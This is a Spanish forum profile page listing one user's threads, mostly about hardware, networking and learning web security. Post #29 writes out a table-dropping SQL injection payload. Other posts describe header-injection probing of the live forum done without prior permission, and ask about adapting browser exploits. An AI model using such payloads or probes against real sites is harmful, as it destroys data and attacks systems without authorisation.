Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Schaiden

#1
Hardware / Opinión sobre el equipo que quiero armar
26 Diciembre 2019, 01:39 AM
Buenas gente! Estoy por armarme una PC nueva y quería saber que opinan sobre mi elección de los componentes en base a lo que busco. La pienso utilizar como workstation, busco poder tener 2 VM corriendo en simultáneo, y muchos programas tanto en el equipo host como en las máquinas guests, poder asignar con tranquilidad cores y memoria a cada VM:


mother -> Gigabyte B450M DS3H
micro   -> Ryzen 7 2700
ram      -> Hyperx Fury 8gb 2400  (2 unidades)
fuente  -> Evga 750 N1
disco    -> Ssd 480 Gb Kingston A400


No pretendo que sea una PC gamer, por ende todavía no incluyo una tarjeta gráfica dedicada, pero en un futuro me gustaría añadirle una tarjeta como la siguiente:

Placa Video Amd Aorus Radeon Rx580 8gb Gddr5 Black Edition

Ya poseo un disco rígido de 512gb, y más adelante pienso agregarle también otro de 2tb. Lo que más me genera dudas de todo lo que listé hasta ahora es la fuente. Tengo entendido que EVGA es una marca confiable, y con una de 750w voy a poder alimentar tranquilamente el equipo que pienso armar, teniendo en cuenta que a futuro podría agregarle la placa de video que mencioné y otro disco rígido de 2tb. (no descarto tampoco agregar más memoria RAM). El asunto es que el modelo de la fuente que les mostré es el modelo básico de 750w de EVGA. Despues hay modelos que tienen Plus gold, modelo supernova no se cuanto, pero los precios ya son muy altos... Puedo estar tranquilo con la fuente que me quiero comprar teniendo en cuenta los componentes que pienso alimentar? Muchisimas gracias desde ya! Saludos
#2
Mensajería / Grupo de telegram
16 Agosto 2019, 20:19 PM
Buenas! Como va? Tenemos un grupo de telegram con gente de mi universidad que le interesa la seguridad, redes, infraestructura, y demás, y podemos hablar de cosas geeks, mandar articulos, lo que sea. Me gustaría que participara más gente, no importa de que lugar sean. Si se quieren unir, me pueden pasar su alias, por acá o por MP y los agrego!

Me gusta la idea de poder compartir y conversar en tiempo real, y poder hablar de cosas random que nos interesen. De todas formas, éste foro sigue siendo el lugar más importante para aportar cosas reelevantes, o hacer preguntas ya que luego los posts pueden ser vistos por mucha gente que le puede ser de utilidad.

Saludos!
#3
Voy a parecer muy molesto, pero realmente molestar no es mi intención, sino aprender. En unos meses leí todos los libros recomendados por Jason Haddix (el de pruebas  de Owasp v4, The web application Hackers Handbook v2, Hacking 101 how to earn money hacking ethically, Mastering Modern Web Application Testing y el de Introduccion a infosec), además de haber leido todos los posts de la página de brutelogic, y muchos artículos de distintos lados en tiempos pasados. Probé varias cosas en mi propio entorno virtualizado, asi que tengo bastante teoría en la cabeza, un poco de práctica con mis VM's, pero muy poca práctica a la hora de testear páginas en producción. El ataque que intenté anteriormente:

https://foro.elhacker.net/dudas_generales/probar_la_seguridad_de_elhackernet_y_reportar_cualquier_falla_esta_bien_visto-t498564.0.html;msg2201596#new

solo se podría probar creando un nuevo thread en el foro. Gracias string Manolo por hacerme notar la estupidez de dar detalles de lo que estaba haciendo dentro del mismo thread... Pero tal vez podría haber inyectado el header en otro post en el que hago alguna pregunta, o algún aporte, asi el ataque no sería tan evidente por otros usuarios. Lo digo porque sino hay una superficie de ataque en la que no se podría testear, y tal vez exista alguna vulnerabilidad en ese lugar. Preferiría pensar que no existen. Por eso me gustaría saber que opinan sobre lo que digo, que me den recomendaciones, o me corrijan si estoy equivocado.

Muchas gracias nuevamente!
#4
Buenas, hace unos minutos intenté inyectar el header X-Forwarded-For que es contemplado en la parte inferior derecha del thread por el usuario que lo publica y por los admins, para ver si se almacena en la BD el valor especificado en la cabecera en lugar de mi IP real, y probar la posibilidad de que exista una vulnerabilidad del tipo Stored XSS o SQLi. Luego de probar, noté que el header es ignorado, y mi IP real es almacenada. El post lo borraron como lo había solicidato. Mi duda es... Les resulta molesto si hago otra clase de pruebas que impliquen crear nuevos threads, o es bien visto si mi finalidad es ayudar a mejorar la seguridad del sitio. Seguramente ésta página ya fue ampliamente testeada, pero de todos modos quería saber eso. Si les parece correcto, o lo consideran spam? Muchas gracias desde ya.
#5
Buenas! Que tal? Quería comprarme un access point y una antena a parte de 15dbi, pero quería saber si en un access point con 2 antenas, al reemplazar una de las antenas que vienen de fábrica por la de 15 dbi, o bien por un cable conectado a la de 15dbi, no habría problema en dejar la segunda antena de fábrica conectada tal como está, o si habría que quitarla y poner un tapón, o si para lo que yo quiero me convendría buscar un access point que lleve una sola antena? Estuve buscando en un sitio de compras de mi país pero no encuentro access point que solo lleven una antena, lo que se encuentra es éste modelo:



y yo querría agregarle ésta antena:



La idea sería dejar la antena tp-link en exterior, a través de un cable conectado a uno de los conectores sma del access point (sacando una de las antenas de fábrica).

Espero haber sido claro... Muchas gracias de antemano!

Saludos.
#6
Muy buenas a todos! Quería plantear mis dudas sobre electricidad estática y esd, ya que es un tema del que muchos hablan, pero todos dicen cosas distintas y hay cosas que no me terminan de quedar claras. Por más que muchos ni se protegen contra la electricidad estática, y la posibilidad de que la estática afecte a los componentes sea baja, me gustaría protegerme, pero hacerlo correctamente, ya que si me protejo sin entender bien las cosas puede que esa "protección" no sirva de nada.

Vi videos de gente que usa la pulsera antiestática conectándola a la parte lateral del chasis de la PC, estando éste apoyado en cualquier lado, sobre una mesa por ejemplo. Pero otra gente que dice que el cocodrilo, tiene que conectar a tierra... Entonces tendría que poner una jabalina en la tierra, un cable al que pueda tener acceso, y conectar el cocodrilo a ese cable? Asi como utilizar la puesta a tierra que ya tengo?

Ahora, tomando como ejemplo el primer caso, de conectar el cocodrilo a la parte lateral del chasis apoyada sobre una mesa, no entiendo que diferencia habría entre hacer eso a directamente tocar con la mano la chapa... No me estaría descargando de igual forma?

Tomando como ejemplo el segundo caso, de conectar la pulsera a tierra, no sería lo mismo a trabajar descalzo sin pulsera y sin nada? Al estar descalzo no estaría descargando la estática a tierra?

Espero que me puedan ayudar a disipar mis dudas, ya que es un tema que jamás me terminó de quedar del todo claro.

Gracias desde ya! Saludos.
#7
Hacking Wireless / Longitud de cables y perdidas
26 Septiembre 2018, 05:35 AM
Buenas! Estoy casi seguro de la respuesta a lo que vengo a preguntar, pero quiero que me lo confirmen. Cuando conectamos un cable entre un adaptador wireless y una antena que hayamos fabricado, por cada metro de cable estamos perdiendo potencia, dependiendo el tipo de cable usado. Bueno, pero si uso un cable muy corto entre el adaptador y la antena, pero un cable USB largo entre el adaptador y la PC, podría lograr tener la antena junto con el adaptador en un lugar alto, bien separado de la PC y con perdidas mínimas por la corta longitud del cable de la antena. Es cierto lo que propongo? Usar un cable USB muy largo no afecta en nada no?

Gracias desde ya! Saludos
#8
Windows / Apagar Windows forzadamente con un script
23 Septiembre 2018, 13:35 PM
Buenas! Estoy teniendo el problema de que la PC se apaga instantaneante cada tanto. Ya limpié todos los coolers, los lubriqué, limpié el disipador, cambié la pasta térmica del procesador, pero sigue pasando lo mismo. Es una PC vieja, me parece que deben estar inflados los capacitores de la mother o de la fuente. Mientras hice el mantenimiento, no me avispe de revisar el estado de los capacitores (nunca los había tenido en cuenta, pero siempre hay una primera vez), asi que mañana los reviso bien. Y voy a seguir tomando las temperaturas, y chequear si el flujo de aire está bien, o si hace falta agregar un cooler, aunque me inclino más por lo primero que digo.

Bueno, me explayé mucho en la introducción pero lo que vengo a preguntar no es sobre qué piensan ustedes que puede ser (aunque si quieren agregar algo obviamente están bienvenidos).

Aunque no creo que sea lo que me está pasando a mi, me surgió la curiosidad de cómo a través de un script se podría llegar a apagar la PC inmediátamente, sin cerrar sesión, como si apagaras el switch de la fuente, o mantuvieras apretado el boton de apagado por un segundo. Googleando un poco, con todo lo que me topé, fue con el comando "shutdown" que todos conocemos. Señalan la ópcion -f de apagado forzado, pero ese apagado forzado significa que no te pregunte si queres cerrar los programas activos, de todas formas Windows cierra sesión y apaga el equipo de forma segura y no instantaneamente. Según  un artículo que leí en internet, la ultima fase del apagado de Windows, es la de:

CitarPara terminar, Windows envía la señal de apagado ACPI que es lo que realmente apaga el ordenador definitivamente.

Supongo que se podría escribir un programa en C que interactúe con el ACPI para apagar la PC instantaneamente, pero antes de seguir en ésta dirección, me gustaría saber si ustedes conocen algún método sencillo para realizar ésto... Supongo que debe haber algún truco que sea más simple, sino igual voy a seguir googleando, ya que me resultó interesante la idea de simular a través de software, los síntomas  que tiene una PC cuando falla el hardware.
#9
Muy buenas! Les comento el problema. Mi papá instaló Linux Mint con kernel 4.10 de 64 bits en su computadora, teniendo instalado Windows 7 Starter 32 bits. Luego de instalar Linux, la computadora arranca directamente con Linux, sin mostrar las opciones del grub. Dentro de Linux probé utilizar los comanods os-prober y update-grub, y sigue sin encontrar la partición que tenía con Windows. Luego di un vistaso con el gparted y noté que el Linux se había instalado junto con el SWAP dentro de una partición extendida.

En resumen, tendríamos algo asi como:

/dev/sda1  NTFS   Espacio reservado de Windows    (primaria)
/dev/sda2  NTFS   Windows 7 32 bits                      (primaria)
/dev/sda3  extendida con:                                     (extendida)
     /dev/sda4  ext4  Linux Mint 64 bits                   (lógica)
     /dev/sda5  ext4  SWAP                                    (lógica)

Lo que me imagino es que para solucionarlo debería mover tanto la partición lógica de Linux y el SWAP a nuevas particiones primarias, y eliminar la extendida, o bien mover las dos con NTFS como lógicas dentro de la extendida, pero dentro de las opciones de gparted no encontré como hacer éste procedimiento.

Quería saber si haciendo lo que planteo puedo llegar a resolver mi problema, en caso positivo, con qué herramienta, y que me corrijan si tal vez el problema se trate de algo que no esté teniendo en cuenta. Otro motivo que pensé después, que también podría ser el causante del problema, sería que se haya sobrescrito algo dentro de la partición reservada para windows (/dev/sda1)... Me gustaría saber como proceder en éste caso.


Muchas gracias desde ya!

Saludos.
#10
Buenas, conozco las 4 libertadas que brinda la licencia GPL y la única obligación que sería el copyleft. Pero me parece que no hay nada que impida que una persona tome software de otro y lo empiece a modificar hasta terminar haciendo algo mas grande, y luego cambiarle el nombre de autor por el de uno mismo. Quería saber que opinan ustedes sobre el tema. Saludos!
#11
Redes / Duda sobre root servers
9 Julio 2018, 22:04 PM
Buenas, que tal, estaba estudiando BGP y anycast, y luego de hacer ejercicios prácticos logré comprender bien como funciona anycast sobre los root server, pero el anycast sirve para replicar root servers de una determinada letra, mi duda está en el paso previo, es decir, cuál de todas las letras de root servers es la elegida cuando yo hago una consulta DNS? Se elige una letra de root server aleatoria? Tal vez no esté siendo claro con la pregunta.. Es decir, cada letra de root server tiene una IP determinada, luego determinada letra puede tener varios root server físicos con la misma ip replicados a través de anycast, y los routers sabrían cuál camino tomar dependiendo del AS-PATH más corto... Mi duda es, como se decide a que letra de root server se empieza a consultar? Es aleatorio? O como funciona?

Gracias desde ya.
#12
Buenas, hace mucho que me está pasando ésto. Cuando quiero descargar algo, por poner un ejemplo, un .iso de Ubuntu, (1,5 Gb aprox), descarga a 1,5Mbps aproximadamente, y luego me impide seguir navegando, escuchando musica con youtube, tanto a mi como en otra computadora de mi red. Yo estoy contratando 12Mb, y el speedtest me dice que descargo a 30Mb, x lo q no se si es que estoy oupando todo mi ancho de banda con esa descarga como para no dejar ancho de banda libre para el resto de computadoras, celulares, navegadores y pestañas que haya navegando y utilizando internet en mi red. Cando trato de abrir una pestaña cualquiera, no me resuelve el dns, y luego de uno o dos minutos, me conecta a la pagina, pero todo tarda demasiado tiempo. Quería saber si a ustedes les pasa y como solucionarlo. Gracias desde ya. Saludos
#13
Muy buenas! Les voy a contar una historia muy frustrante llena de ira y fallas. Mi papá compró una computadora usada que tiene:

biostar p4m890-m7 pro
Intel Pentium 4
2GB RAM DDR2
Fuente de 400W

Los problemas que tiene son muchos y muy variados. A veces al encenderla se distorcionan los colores, otras veces arranca con un BSD (pantallazo azul), la mayoría de veces se borra lo que está en la CMOS y tengo que volver a configurar la hora y quitar al Floppy Disk como disco principal. La pila ya la cambié por una nueva y eso último sigue pasando. A veces arranca con un pitido continuo que se repite, y algunas veces no me detecta el teclado una vez entrado al BIOS, es decir, presiono supr y luego dentro del BIOS no me toma el teclado y no puedo volver a configurar la hora. Después otro problema es que cuando logra arrancar bien no detecta bien la memoria que hay. Probé con 3 memorias distintas (todas DDR2, dos de 1gb y una de 512mb), todas las combinaciones posibles varias veces en los dos slots que hay. A veces me detecta 1GB y 512mb utilizables y a veces 2GB y 960mb utilizables. Me volví muy loco revisando la computadora, el problema es que yo aun no trabajo y mi papá sufre de un fuerte TOC y está desempleado, asi que entre los problemas de la PC  y la obsesión de mi papá por arreglarla, me llevó a cometer algunas tonterías como sacar el disipador a la ligera y querer volverlo a colocar rompiendo las patitas de plastico que lo sujetan al limpiar el disipador, colocar la pasta y limpiando todo el resto de la mother... Ese ya es otro problema que tendría que ver como solucionar, ya que sin esas patitas de plastico no queda bien sujeto. También forcejié un poco la motherboard, con la intención de romperla porque estaba muy frustado, pero no llegué a hacerle ningún daño físico supongo. Luego mi papá insistiendo con preguntas sobre como poder arreglarla o que hacer, la agarré y la sarandié un poco. No hice nada taan brusco, solo la agite un poco en mis brazos, y el disipador de aflojo un poquito. Luego de ajustar mejor el disipador al querer encenderla directamente no encendía. Mi papá probó luego volver a enchufarla y el cooler del procesador se movío apenitas y después nada. Al presionar el botón ya no pasó más nada... Yo todo el tiempo pensé que el problema estaba en la motherboard, la RAM no era el problema porque probé muchas combinaciones y al parecer no era el problema. Pero ahora leyendo un poquito más estoy empezando a pensar en que tal vez estuve todo el tiempo equivocado y el problema es la fuente. Me gustaría que me cuenten que piensan ustedes, y si ya tuvieron problemas parecidos. Como detalle podría decirles que una vez que arranca y carga windows todo anda bien (sin tener en cuenta que detecta muy poca memoria), pero no se me apaga ni nada una vez que inicia...

Muchas gracias desde ya por leer! Saludos
#14
Muy buenas tardes. Resulta que tenía que imprimir una factura para una señora mayor que cuando quiso ir a pagar al rapipago sin factura le dijeron que no funcionaba el sistema y que necesitaba si o si la factura, entonces me encomendó a mi crearle una cuenta y asociarla al teléfono para poder imprimir la factura. En el proceso hubo cosas que realmente me sacaron de quicio, ya que toda la funcionalidad de la página debería ser facil de utilizar para el público y minimizar la cantidad de errores que te devuelve. Yo que estudio informática, me sentí un inoperante con el sistema ya que cada cosa que hacía me devolvía 2000 errores... Qué estoy haciendo mal? Me preguntaba. Primero ingresé en ésta página:

https://web.telefonica.com.ar/online/portal/inicio/mi-cuenta/ayuda/cupon-pago/primera-hoja-factura/

y una vez que termino de ingresar los datos me salta ésto:

Cambiamos nuestros sistemas para darte un mejor servicio, para ver tus facturas ingresá en www.telefonica.com.ar/micuenta/ y accedé a tu cuenta.

Parece como si le estuvieran tomando el pelo a uno... Por qué van a dejar un formulario que ya no se usa mas???? Luego accedí a esa parte, y tuve problemas con los datos que me pedía, sobre todo el nombre de usuario, que respetaba perfectamente el formato, pero me seguía diciendo que era inválido. Por ejemplo, ingresando bien todos los demas campos, y en usuario algo como 'barbarita', me saltó El nombre de usuario ya está en uso, por lo tanto probé 'baarbaritaa', y me decía Formato incorrecto, luego ingresé todo igual y en nombre de usuario 'nemeciada', y el sistema lo aceptó... Inentendible por qué reaccionó de esa forma el sistema, ya que baarbaritaa y nemeciada son dos strings sin caracteres especiales de casi la misma longitud, pero uno tira el error de Formato incorrecto, y otro es aceptado... No entra en mi mente.

Luego tenía que agregar el número de teléfono para asociar a la cuenta, y probé primero ingresando el código de área con 0 y luego sin 0. Y ambas veces me devolvía:

El número de línea que ingresaste no es correcto o no pertenece a un cliente de Telefónica.

Cansado de tanto pelear con éste sistema asqueroso, llamé a atención al cliente y me dijeron que el número de teléfono que ingresé es válido en el sistema, y que me iban a mandar la factura por email, y que el sistema está siendo actualizado y que estaba tirando algunos errores...

Mis dudas son... En transiciones como éstas, donde están cambiando bruscamente sus sistemas y evidentemente están dejando expuesto al público un sistema que anda muy mal, es más probable en éstas condiciones encontrar vulnerabilidades de seguridad? Mi otra duda sería, dónde está el Chema Alonso y todo su gigante equipo para impedir que sistemas tan defectuosos como éstos sean accesibles al público?

Muchas gracias por sus opiniones y ayuda.
#15
Buenas! Hace un año o más había probado el linset, y yo recuerdo que mi android una vez que se quedaba sin conexión con la red verdadera, se conectaba automáticamente con la red abierta falsa clonada. Actualmente volví a probar el ataque y mi teléfono una vez que se queda sin conexión con la red auténtica no se conecta al AP falso clonado, y no solo ésto, sino que tampoco se puede conectar al AP falso manualmente, nunca se llega a asociar ni recibir la IP... Me gustaría saber si a ustedes les pasa lo mismo, y si tiene que ver con alguna nueva característica de los Android, del NetworkManager, o de lo que sea. El Android con el que lo estoy probando está en la versión 4.4.4.

Saludos!
#16
Buenas! Quería saber si es buena práctica utilizar paths absolutos de la siguiente forma al incluir distintos archivos, por ejemplo:

Código (php) [Seleccionar]
require_once($_SERVER['DOCUMENT_ROOT']."/model/ClasePaciente.php");
require_once($_SERVER['DOCUMENT_ROOT']."/model/RepositorioPaciente.php");


Porque tuve muchos problemas al utilizar paths relativos, ya que dependiendo de donde este parado, el archivo se carga o no, entonces vi ésta como posible solución... Tambien intente utilizando:

Código (php) [Seleccionar]
$root = $_SERVER['DOCUMENT_ROOT'];
require_once($root."/model/ClasePaciente.php");
require_once($root."/model/RepositorioPaciente.php");


para que quede más legible y con menos caracteres, pero tendría que definir esa variable por cada php distinto al que accedo a través de la accion de los formularios html, y me resulta incómodo. Probé definiendo constantes y me encuentro en la misma situación, asi que me parece una solución razonable. Que piensan?

Por otro lado, no es posible que el atacante pueda editar el valor de $_SERVER['DOCUMENT_ROOT'] y lograr vulnerar la aplicación a través de un path traversal por ejemplo?

Saludos y muchas gracias!
#17
Buenas! Probe utilizando la máquina del tiempo y viendo la primera noticia de esa fecha, no sirvió, asi que terminé probando todas las noticias existentes, ingrasanto tanto título, como cuerpo y titulo/cuerpo de todas las formas posibles y no pude superar el reto con ninguna... Será que el snapshot que tiene la maquina del tiempo haya borrado alguna información y el reto ya no se pueda resolver? Alguno que lo haya resuelto y recuerde como lo resolvió, me gustaría que se fijara si todavía puede ser resolvible... :p Gracias!
#18
Buenas, resulta que hace un tiempo había probado ésta herramienta y solo pude hackear Windows 7 x86 sobre Firefox con los pluggins desactualizados (por ejemplo flash). Pero cuando probé instalar la misma versión vulnerable de flash en un windows 7 x64 el exploit no funcionó. También probé Windows 7 x86 con Chrome, misma versión del pluggin, y no hubo caso tampoco... En linux tampoco pude explotar versiones vulnerables de plugins. Entoneces hoy en día que ya java (NPAPI) no es màs utilizado por los navegadores, solo quedaría flash. Y si para explotarlo ademas de que sea una versión vieja, necesitar que la víctima use Firefox y esté en un Windows 7 x86 se hace muy dificil de llevar a cabo. Quería saber si modificando o toqueteando en algún lado los exploits que lanza el browser_autopwn y browser_autopwn2 podría llegar a adaptarlos para SO de x64 y navegadores Chrome o si ya existen pùblicos exploits que afecten a  dichos sistemas y yo esté ignorando.

Muchas gracias y saludos!
#19
Seguridad / Confusión con blind SQL injection
27 Septiembre 2017, 02:46 AM
Buenas! Hay lugares en los que te explican blind SQL injection de una forma y otros en los que te la explican de otra.

Explicación 1:
Blind SQL injection se da cuando el servidor no muestra mensajes de error al hacer una consulta SQL malformada, sin darle información al atacante sobre como podría formar una consulta válida.

Explicación 2:
Blind SQL injection se da cuando los datos consultados en la inyección no son mostrados en la misma web, por lo tanto para comprobar su existencia hacen faltas de pruebas basadas en tiempo, etc, para confirmar según el comportamiento del servidor si un dato existe o no.

Según el tiempo que llevo usando sqlmap, y artículos y cosas que vengo leyendo, para mi lo que más tiene sentido que sea una blind SQL injection es la de la explicación 2. O sea si el servidor simplemetne no muestra información de error no complicaría tanto las cosas. Solo hay que probar varias inyecciones hasta que se muestre los datos que esperamos ver. En el otro caso hay que hacer pruebas muy distintas basadas en tiempo...

Bueno, me gustaría que me ayudaran a despejar ésta duda.

Saludos!
#20
Seguridad / Payloads ofuscados? Antivirus?
26 Septiembre 2017, 22:45 PM
Buenas, estaba leyendo éste artículo del Chema Alonso:

http://www.elladodelmal.com/2017/09/owasp-zsc-zeroday-cyber-research.html

que muestra una nueva herramienta para crear shellcodes ofuscados para insertarlos en los exploits. Mi duda es por qué un payload necesitaría ser ofuscado? Supuestamente el antivirus no es que solo analizaba el disco? Es decir, que es capaz de detectar archivos maliciosos? Pero en el caso de los exploits, consiguen tomar el control de la pc sin necesidad de ningún archivo, ya que utilizan al proceso vulnerable para ejecutar codigo, yendo directamente a memoria sin tocar el disco. Cómo es que un antivirus podría llegar a detectar una shellcode de un exploit si la misma no está ofuscada?

Gracias y saludos!
#21
Electrónica / Pitido en amplificador Edifier 2.1
16 Septiembre 2017, 18:15 PM
Buenas, resulta que mi amplificador Edifier 2.1 empezó a hacer pitidos insoportables muy cortitos cada ciertos segundos mientras estaba conectado a la PC. Luego de hacer varias pruebas notamos que el pitido sonaba en en ampli, sin estar conectado a la PC. Si al ampli le desconectas la salida de audio se escucha el pitido muuy muy bajito desde adentro del ampli. Si conectas los parlantes a la salida ahi suena muy fuerte. Alguna idea? Nunca me paso algo asi.

Saludos!
#22
Hardware / Sobre discos SSD
13 Septiembre 2017, 11:33 AM
Muy buenas! Resulta que tengo una PC con un disco de 1tb HDD prácticamente completo con cosas que me resulta dificil eliminar... El arraque es bastante lento, y me gustaría saber si comprando un disco SSD de 160GB podría notar muchas mejoras en cuanto al rendimiento en general y la velocidad de arranque.

Por otra parte quería saber que me recomiendan instalar en el SSD ya que la capacidad es poca... Yo pensé en instalar el SO y todas las máquinas virtuales que uso, y herramientas relacionadas con la informática, programación, seguridad, etc... Y en el HDD los juegos, música y programas que no utilizo con mucha frecuencia.

Saludos y gracias!
#23
Buenas! Existen muchisimas páginas relacioandas a la seguridad informática que suben artículos a menudo, pero abrir cada una de esas páginas todos los días para estar al tanto se puede hacer tedioso, además de poder estar ignorando novedades en algúna página que uno no conoce... Quería saber si existe alguna web que recopile enlaces de las webs de hacking, o que informe de novedades pero con bastante cobertura, es decir, que no deje escapar nada..

Sino cuentenme como hacen ustedes, que sitios visitan y con qué frecuencia. Muchas gracias!
#24
Seguridad / Que antivirus usar?
6 Septiembre 2017, 06:30 AM
Buenas. Siempre busco en la web las comparativas de los antivirus actuales pero me parecen muy básicas, no creo que hayan sido sometidos a pruebas rigurosas... Me gustaría que alguien que tenga experiencia con malware, que sepa cuales suelen ser los que más detectan y las características básicas de cada AV me aconsejara el mejor antivirus de la actualidad, o un buen criterio para escoger el mejor del momento... Hoy en dia estoy usando Avast. Lo que me gusta es que no me consume demasiados recursos. El NOD32 lo probé y tiene muchísimas características pero hace muy lenta la PC. Según había leido en algún lado, hay técnicas específicas para esquivar a NOD32, tal vez esas técnicas estén obsoletas... Bueno, en fin, me gustaría saber para ustedes cual es el antivirus más seguro, no importa si consume muchos recursos... Y adicionalmente si quieren recomendar un antivirus que tal vez no sea tan completo pero sea muy muy rápido, también estaría interesado de saberlo.

Muchas gracias!
#25
Buenas! Para encontrar en el codigo errores de seguridad como los de SQL Injection, XSS persistente, XSS reflejado, LFI, RFI, etc, habría que tener el php (o el lenguaje que se use del lado del server), ya que en el php que procesa el servidor se podrían identificar las fallas viendo el código... Como un atacante no suele disponer del php del servidor (excepto en caso de que use wordpress u otro CMS, o que el codigo server side se haya filtrado de alguna forma), suele utilizar pruebas de caja negra mejor conocidas como pruebas de penetración...

Bueno, hasta aca bien... Ahora lo que yo quiero saber es qué clase de fallas pueden estar visibles en el código fuente del lado del cliente, el cuál está disponible para todos y de cualquier sitio ya que es algo que se ejecuta del lado del cliente... Hoy estuve investigando sobre el DOM based XSS y éste sería un ejemplo de fallas que se pueden encontrar en el código del lado del cliente, ya que la falla puede ser visible en algún script de javascript...  Luego, otra utilidad de revisar el código fuente sería la de encontrar comentarios o parametros hidden que nos den alguna información util.... Entonces hasta ahora tengo que:

Revisar el código del lado del cliente sirve para:
-Encotrar fallas del tipo DOM based XSS
-Encontrar comentarios o párametros hidden que den informacion util
-Ver versiones de CMS, y tecnologías, librerias, APIs utilizadas (Puede ser visto con Wappalizer)

Hasta ahora se que podría servir para esas tres cosas, pero me gustaría que me dijeran algún otro tipo de falla o información valiosa que pueda estar presente en el source clientside y  pueda servir a la hora de probar la seguridad de un sitio web. Ya que estoy seguro de que revisar el codigo fuente clientside puede llegar a ser incluso mas util de lo que pienso...

Saludos y gracias! :D
#26
Muy buenas! La primer duda que tengo es: cada banco tiene su propia red y la red interbancaria (Red Link por ejemplo, soy de Argentina) simplemente interconecta las redes de cada banco o si Red Link (o la red interbancaria) se encarga de gestionar las redes de todos los bancos por si sola, o sea, como si de una sola gran red se tratase... Después no termino de entender como sería todo el recorrido de las transacciones en compras online, es decir, los datos que ingresamos a veces son procesados y guardados en el servidor de la misma página y a veces los datos son procesados por un organismo a parte (por ejemplo http://www.nps.com.ar )... Hasta ahí bien... Pero cómo se comunican después esos organismos, (o bien los mismos servidores de la web con el carrito de compras) con el banco para comprobar la información de las tarjetas y hacer las compras/transacciones? Se interconecta con alguna red interbancaria (Red Link por ejemplo)?

Muchas gracias por la información!
#27
Muy buenas! En caso de que un atacante cree una página de phishing, o que intente atacar a nuestro navegador/pluggins, o embeber un ataque del tipo CSRF, etc, si yo descubriera y tuviera pruebas de que la web es maliciosa podría denunciar directamente a la persona por su nombre y sus datos? Ya que al adquirir un certificado SSL, los datos del atacante estarían públicos y accesibles a través de un whois a su web. Quería saber si la información que el atacante utilizara al registrarse al comprar el certificado SSL podría ser falsificada de alguna forma.

Saludos y gracias!
#28
Hola! Soy de Argentina y supongamos que tengo Cablevision clásico (analógico). Tenía la duda de  si consiguiendo un decodificador de la empresa podría tener Cablevisión digital. Por ejemplo, si tengo un amigo que paga Cablevisión digital, y llama diciendo que le entraron a robar y le robaron el decodificador, podría usar el suyo y el usar el nuevo que le de la empresa? O la empresa de alguna forma podría bloquear al viejo decodificador?

Aclaración: soy pobre y los TV de casa son CRT,  sin HDMI obviamente, asi que esta pregunta es por pura curiosidad.

Saludos y gracias!
#29
Muy buenas! Yo se que siempre que se hace una consulta para ver algún dato de alguna tabla, si el parametro que está dentro de la consulta no filtra los '' (en caso de que el parámetro fuera un string), o si no verifica que sea estrictamente un entero (en caso de que el parametro fuera un entero), la aplicación sería vulnerable a mandar un UNION SELECT y elegir datos de campos y tablas que nosotros queramos, siempre y cuando se respete el num de columnas respecto a los correspondientes de la consulta original, de ésta forma podríamos estar leyendo en la base de datos. Pero lo que yo siemrpe quise saber es cómo eliminar tuplas o tablas enteras. Para borrar todas las tablas intenté utilizando ; (púnto y coma) en medio de la inyección y luego la sentencia DROP ALL TABLES. Ejemplo:

http ://www.example.com/articles.php?id=-1'; or 68 = '66; DROP ALL TABLES; --

Y no funciono, luego de googlear un poco encontré que la mayoria de aplicaciones no soportan el apilamiento de consultas, es decir, luego de llegar al punto y coma no se sigue leyendo más:

https://security.stackexchange.com/questions/33900/sql-injection-drop-all-tables

Documentación de PHP:
mysql_query() sends a unique query (multiple queries are not supported) to the currently active database on the server that's associated with the specified link_identifier.

Entonces por lógica, supongo que la única forma de eliminar tuplas o tablas sería lograr inyectar en una consulta que en vez de ser de tipo SELECT, fuera DELETE (para eliminar tuplas), o DROP (para eliminar tablas), lo que me parece muy dificil de encontrar, ya que por ejemplo un delete_user.php vulnerable que tuviera una consulta como ésta:

DELETE FROM users WHERE id = ?

yo supongo que el delete_user.php solo sería accesible para el admin, y si consiguieramos el panel y las credenciales del admin, ya no tendría utilidad la vulnerabilidad de SQL inejction, ya que el delete_user.php ya nos permite en si eliminar datos de la BD

Me gustaría saber si estoy acertado en ésto, o si tal vez estoy ignorando algún otra técnica para eliminar cosas de la BD. Y también saber si alguna vez encontraron alguna aplicacion vulnerable que permitiera la eliminacion de datos en la DB. Saludos y gracias!
#30
Seguridad / Como aislar una VM de la red local
17 Agosto 2017, 00:33 AM
Muy buenas! Estaba viendo algunos conceptos relacionadas con la seguridad y el hardening. Uno de ellos es el aislamiento, es decir, aislar cada servicio en una diferente màquina virtual. Por ejemplo, si quiero contar con servicios de SMTP y HTTP, pondría Apachee/nginx en una VM y el servidor SMTP en otra VM... Ahora, lo que yo quiero lograr es que desde la VM no pueda escanear los otros host de la red, incluyendo al host sobre el que corre la VM y otras PCs que pueda haber en la misma red. Lo que hice para intentar lograr esto fue dejar configurada la VM con NAT. Mi red sería la 192.168.0.0/24, el host sobre el que tengo la VM serìa 192.168.0.100, y la VM configurada a travès de NAT tiene una IP que comienza con 10.x.x.x. Yo desde la VM con IP 10.x.x.x probé hacerle ping a 192.168.0.100 (la pc sobre la que corre la VM), y tambien escanearlo con nmap, y pude comunicarme con los puertos abiertos a nivel de LAN, y tambien obtuve las respuestas del ICMP... Tambien escaneando la red: nmap 192.168.0.0/24 -sP, puedo ver la direcciòn del router (192.168.0.1), y otras PCs fisicas de mi red. Me gustaría poder evitar esto. Es decir, que si estoy en la VM 10.x.x.x y quiera escanear la red 192.168.0.0/24 no obtenga ninguna respusta. Hoy por hoy estoy experimentando en mi propia red con VirtualBox desde Windows. El dia de mañana si tengo que administrar un servidor supongo q utilizaria Linux con kvm o xen. Y me gustaría lograr ésta aislamiento, asi si por ejemplo, el servidor web tiene una vulnerabilidad, que sea incapaz de acceder a los equipos de la red local para hacer pivoting, ataques MITM, tener acceso al SMB de los Windows de la red, etc... Espero haberme explicado bien. Saludos y gracias de antemano!
#31
Muy buenas! Me surgió la duda sobre cómo hace un proveedor de CATV (por ejemplo VTR, Cablevision,etc) para bloquear ciertos canales, como por ejemplo HBO, Venus, y otros canales, y cómo los debloquea cuando uno paga la suscripción para dichos canales... Saludos y gracias
#32
Seguridad / Apache vs NGINX
26 Julio 2017, 03:24 AM
